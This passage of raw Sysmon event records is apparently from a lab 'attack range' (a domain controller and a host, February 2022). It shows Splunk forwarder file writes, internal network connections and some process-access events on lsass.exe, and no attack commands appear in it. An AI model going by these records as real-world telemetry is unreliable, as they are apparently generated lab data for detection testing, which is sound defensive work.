Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=346522362D5073D9C5A97FC503FDC35F,SHA256=F8EB69922154CC75AD6FC8275ABEF1B8219F06190717D83EF1EB0FD373979EBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:26.843{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EF4708C4ECC2CF6B20EBCD14122DA68,SHA256=FB609E295DC6F82062151259476F258470CF401F2E75803E4E204876B2339C18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:26.119{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0231F5C3A8B763E921EC5A4004265E0,SHA256=1D1C46FE5CED358E834DCC5DF2589A75FB8E0B9DDA7E6D34BD240CFB99A7E0C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:27.859{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DDD0D0BAC35F5DD1D97E85191485FB9,SHA256=88D8161E2A3AFEA2F39391BBAA3D8891D68D56933AFC9623EDF10D9A4FE9F10B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:27.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1A77D8A7F5DD20D4D75B2EB1B92581A,SHA256=7FB816D53C6CB2AE81A37C441C93378C1E0064D24B80D4CB7D001FF777D06D18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:28.859{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9581F778652062F102ECC6216BEC5D1A,SHA256=081B0224292D448111741783C6B0A60E070900B5ED45FD96121B14BC0C4B5888,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:28.151{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE08C3B828E823A1B1947C3DC9751DD8,SHA256=EB3F060EDE7ED3138D36C3CD2C7285E7866BD5003524D62154BF935B33BEB0E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:29.874{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8484ECE324CC3986184E20488B1ADB36,SHA256=A8ABA986758C41B6F8A1FC1F3C5DD5EC1639796A35B014D4C3017E90A18B2095,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:29.182{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06C9E5494989A81517FF54071F62DF23,SHA256=BDBC3492A5A5074B71C7E7452E9604DF4212CED9776B9338A01BC09933B5B1ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:27.626{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51194-false10.0.1.12-8000- 23542300x8000000000000000214494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:30.890{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AA7680CDB40CA6CEFE69742C837219C,SHA256=B336C5B3080089DD968D78F7629FED98CE745B285E749C20ECFE6B550F267098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:30.197{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72538B3D28BB350C1141586D552BF862,SHA256=E0A498C8B85FBAA8DC34779540B956BAAB5E77591C2F372B33D9D7D657B8D7DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:27.565{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53249-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000214493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:30.234{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=203F829E7BE80FA4E5E04FECFE0FFA83,SHA256=2466C355FC438A5CDCE4153A53B3DDB05569F8145942E944F3BBE50E309D2567,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:31.906{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0423385F744B9419C7582E1BC46C3A4,SHA256=95C5FA8DC727844F36565F38FDD73382C90FA452F7EFA57B6F553C472F228AF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:31.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F735AF47CA3FF54A6C0046DE4D547A3,SHA256=4549613600F245845F6E01CE730E7D7681B13E7CF7BDEC8125CB778A5B48E716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:32.921{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=252FF61C90955A96A184B3FA067D7F06,SHA256=17E1622F28FFDC88D4B9CCA3494C27E55EBCC77E862A5EF359023C08F40B9259,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:32.416{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCC56D4F2F3F135E72D2D87966FF8FE9,SHA256=3B59C7B891637AC25254984724168E679F27F7483CB0BE1923A153F69439E6B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:33.937{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CED9B7F97EC3290A87C8DA0F4B9DEC5,SHA256=31E446F6152AB8D4EE29A5B432A9C299BC3D3C5DA33DDFE883233785EB2C5419,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:33.432{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BD22384ED8D324C3DE408419B35E8F0,SHA256=D9AE19E25187F3BB7BE7F61B965DC76E4654A48C9B85897F7B5F6C31A4A83320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:33.260{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8486C304F0897A36A4F8AB9BE13C58EB,SHA256=233778C1CDF4767FE80A23D92B73036B12D7639E89E8C38E62138E702D94ABB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:34.937{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A845FB1DD70EA6B36E30E5EDA55B78F2,SHA256=D77FDAE96A3BB4D3A19CB32A4C4D4E2917E6C9AE37605B9AF93D2624ACC2658C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:34.447{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11C19901561209D3D9412D540A02CB26,SHA256=46717155AF97C3B8E12DA40DB778D4A68620696B89E05791C6086F52CFCD9EB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:35.937{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B927C4D6B2FF4DDA1F6E64ED37078F24,SHA256=BDF65BB5A9174BD3B8102BAEE26ED13D4AD240A6525C0800895743CFA37F2A15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:35.666{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D51724A0AF2EA6B47A8AC60A83F8C2F4,SHA256=56FB9B865B09E98265D2DB8B40C254BC85D618301302DB05F97B9F09B048E72F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:33.517{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51195-false10.0.1.12-8000- 354300x8000000000000000285378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:33.549{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53250-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000214501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:36.952{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACE81245E5AB2AA0CC43F013AFD81E29,SHA256=904102B32881E3AF641714A3073B9EEF6143975DAAB1E620D0EB13C84F15D0D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:36.682{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D20296B4D70999E442FF1707F47D4F39,SHA256=728C4C009C889F7076BF1165EFE99851444147BB561F810BB617D93D36CED5AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:37.968{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B85AF157DFA774B087E3F63C8A835AFC,SHA256=14DEF2BBE65C822D78D611747EF1083C194FCA7C15AE635CD60EB3D0D59B6EE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:37.713{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7196EED42C223C5250AC38B3A6909DBA,SHA256=8C8C667033F5DAF44322561A8E3ABF428A841EC60D48710CFDA8B5A2CF0A957B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:38.729{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F545CF1A318AF3887090672B1FC1BA,SHA256=383A8C12A34001ACD97610524B0267C7E62D0CA9C609CC33D1B14B35ECD466D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:39.854{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9453C78420F58974389C9867CA47D14,SHA256=6862722A600A4F01A21D9E36AB5F499EDE782570C3DE1FAD457C9ABA353E9345,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:39.957{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-122MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:39.077{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD0BD8A7C00E6671F9735293F5C76E9A,SHA256=831103A69F87CAFCF9D74F2766E30233E173A1E8C15027018F3B842E3D4F335B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:39.479{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D3DD1968A055016B6F0449E8F69764D,SHA256=AC8AAFD8FC5A7B81ABD091951981159E34999266C5B6FEBFC3843CA5F6EB1F85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:40.959{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-123MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:38.705{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51196-false10.0.1.12-8000- 23542300x8000000000000000214505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:40.098{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30AB5059C08C03950E1BB30FC877051A,SHA256=366A52C08D5FFF96DD4628410469C0F0AB786FCD7E4380D266EA3E702B58C96E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.697{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000285386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.604{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:40.588{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:41.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F249D166CA555E6CEDE0A59AD6AD782,SHA256=5499873A6F01B42FA0E4B65111E9C1FAFDF00F94A7EF72DBECE0831B7A8F2326,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:41.144{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73428D7F85A8962F9418775214E7ACE2,SHA256=FC3BC377E3B160813A1438EDA8CF15C29E082EF44E4E6D1F205FA9A225CF2F3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:41.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9DD3363FAA250B7F7E47380D84165226,SHA256=2039113BBCCF0B186D8B22541C323ACEA6764864D1CD2BC31FF602F51253CB26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:41.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA3A8BEDD21C8CE605E2BBA4890DB3A6,SHA256=B72278A3C36DCAE6178FF63742D0FAA6B02B6BE7B8558275E9D22A2B66DF7248,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:39.549{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program 